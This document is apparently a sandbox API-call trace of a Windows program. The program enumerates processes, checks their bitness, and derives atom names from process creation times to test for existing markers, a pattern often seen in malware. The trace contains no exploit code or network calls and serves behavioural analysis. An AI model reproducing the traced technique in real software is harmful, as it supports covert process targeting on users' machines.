	[0103.150] CloseHandle (hObject=0x690) returned 1
	[0103.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0103.150] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.150] CloseHandle (hObject=0x690) returned 1
	[0103.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0103.150] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.150] CloseHandle (hObject=0x690) returned 1
	[0103.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0103.150] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.150] CloseHandle (hObject=0x690) returned 1
	[0103.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0103.151] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.152] CloseHandle (hObject=0x690) returned 1
	[0103.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0103.152] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.152] CloseHandle (hObject=0x690) returned 1
	[0103.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0103.152] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.152] CloseHandle (hObject=0x690) returned 1
	[0103.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0103.153] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.153] CloseHandle (hObject=0x690) returned 1
	[0103.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0103.153] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.153] CloseHandle (hObject=0x690) returned 1
	[0103.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0103.153] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.153] CloseHandle (hObject=0x690) returned 1
	[0103.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0103.154] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.154] CloseHandle (hObject=0x690) returned 1
	[0103.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0103.154] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.154] CloseHandle (hObject=0x690) returned 1
	[0103.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0103.154] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.154] CloseHandle (hObject=0x690) returned 1
	[0103.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0103.154] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.154] CloseHandle (hObject=0x690) returned 1
	[0103.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0103.154] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.154] CloseHandle (hObject=0x690) returned 1
	[0103.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0103.155] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.155] CloseHandle (hObject=0x690) returned 1
	[0103.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0103.155] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.155] CloseHandle (hObject=0x690) returned 1
	[0103.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0103.155] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.155] CloseHandle (hObject=0x690) returned 1
	[0103.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0103.155] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.155] CloseHandle (hObject=0x690) returned 1
	[0103.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0103.155] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.155] CloseHandle (hObject=0x690) returned 1
	[0103.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0103.156] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.156] CloseHandle (hObject=0x690) returned 1
	[0103.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0103.156] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.156] CloseHandle (hObject=0x690) returned 1
	[0103.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0103.156] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.156] CloseHandle (hObject=0x690) returned 1
	[0103.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.156] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.156] CloseHandle (hObject=0x690) returned 1
	[0103.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.157] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.157] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.157] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.157] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.157] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.158] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.158] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.158] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.158] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.158] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0103.158] CloseHandle (hObject=0x690) returned 1
	[0103.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0103.158] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.158] CloseHandle (hObject=0x690) returned 1
	[0103.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0103.158] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.159] CloseHandle (hObject=0x690) returned 1
	[0103.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.192] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0103.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.193] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0103.193] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.193] CloseHandle (hObject=0x690) returned 1
	[0103.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.194] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0103.194] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.194] CloseHandle (hObject=0x690) returned 1
	[0103.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0103.195] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.195] CloseHandle (hObject=0x690) returned 1
	[0103.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0103.195] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.195] CloseHandle (hObject=0x690) returned 1
	[0103.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0103.196] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.196] CloseHandle (hObject=0x690) returned 1
	[0103.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0103.196] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.196] CloseHandle (hObject=0x690) returned 1
	[0103.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0103.196] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.196] CloseHandle (hObject=0x690) returned 1
	[0103.196] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0103.197] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.197] CloseHandle (hObject=0x690) returned 1
	[0103.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0103.197] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.197] CloseHandle (hObject=0x690) returned 1
	[0103.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0103.197] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.197] CloseHandle (hObject=0x690) returned 1
	[0103.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0103.197] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.197] CloseHandle (hObject=0x690) returned 1
	[0103.197] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0103.198] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.198] CloseHandle (hObject=0x690) returned 1
	[0103.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0103.198] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.198] CloseHandle (hObject=0x690) returned 1
	[0103.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0103.198] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.198] CloseHandle (hObject=0x690) returned 1
	[0103.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0103.198] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.198] CloseHandle (hObject=0x690) returned 1
	[0103.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0103.198] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.198] CloseHandle (hObject=0x690) returned 1
	[0103.198] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0103.198] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.199] CloseHandle (hObject=0x690) returned 1
	[0103.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0103.199] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.199] CloseHandle (hObject=0x690) returned 1
	[0103.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0103.199] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.199] CloseHandle (hObject=0x690) returned 1
	[0103.199] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0103.199] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.199] CloseHandle (hObject=0x690) returned 1
	[0103.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0103.200] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.200] CloseHandle (hObject=0x690) returned 1
	[0103.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0103.200] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.200] CloseHandle (hObject=0x690) returned 1
	[0103.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0103.200] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.200] CloseHandle (hObject=0x690) returned 1
	[0103.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0103.200] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.200] CloseHandle (hObject=0x690) returned 1
	[0103.200] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0103.200] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.200] CloseHandle (hObject=0x690) returned 1
	[0103.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0103.201] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.201] CloseHandle (hObject=0x690) returned 1
	[0103.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0103.201] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.201] CloseHandle (hObject=0x690) returned 1
	[0103.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0103.201] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.201] CloseHandle (hObject=0x690) returned 1
	[0103.201] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0103.201] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.201] CloseHandle (hObject=0x690) returned 1
	[0103.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0103.202] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.202] CloseHandle (hObject=0x690) returned 1
	[0103.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.202] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.202] CloseHandle (hObject=0x690) returned 1
	[0103.202] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.202] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.203] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.203] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.203] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.203] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.203] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.203] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.204] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.204] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.204] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0103.204] CloseHandle (hObject=0x690) returned 1
	[0103.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0103.204] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.204] CloseHandle (hObject=0x690) returned 1
	[0103.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0103.205] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.205] CloseHandle (hObject=0x690) returned 1
	[0103.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0103.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0103.240] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.240] CloseHandle (hObject=0x690) returned 1
	[0103.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0103.241] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.241] CloseHandle (hObject=0x690) returned 1
	[0103.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0103.241] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.241] CloseHandle (hObject=0x690) returned 1
	[0103.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0103.241] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.241] CloseHandle (hObject=0x690) returned 1
	[0103.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0103.242] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.242] CloseHandle (hObject=0x690) returned 1
	[0103.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0103.242] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.242] CloseHandle (hObject=0x690) returned 1
	[0103.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0103.242] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.242] CloseHandle (hObject=0x690) returned 1
	[0103.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0103.242] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.242] CloseHandle (hObject=0x690) returned 1
	[0103.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0103.243] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.243] CloseHandle (hObject=0x690) returned 1
	[0103.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0103.243] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.243] CloseHandle (hObject=0x690) returned 1
	[0103.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0103.243] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.243] CloseHandle (hObject=0x690) returned 1
	[0103.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0103.243] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.243] CloseHandle (hObject=0x690) returned 1
	[0103.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0103.243] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.243] CloseHandle (hObject=0x690) returned 1
	[0103.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0103.244] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.244] CloseHandle (hObject=0x690) returned 1
	[0103.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0103.244] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.244] CloseHandle (hObject=0x690) returned 1
	[0103.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0103.244] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.244] CloseHandle (hObject=0x690) returned 1
	[0103.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0103.245] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
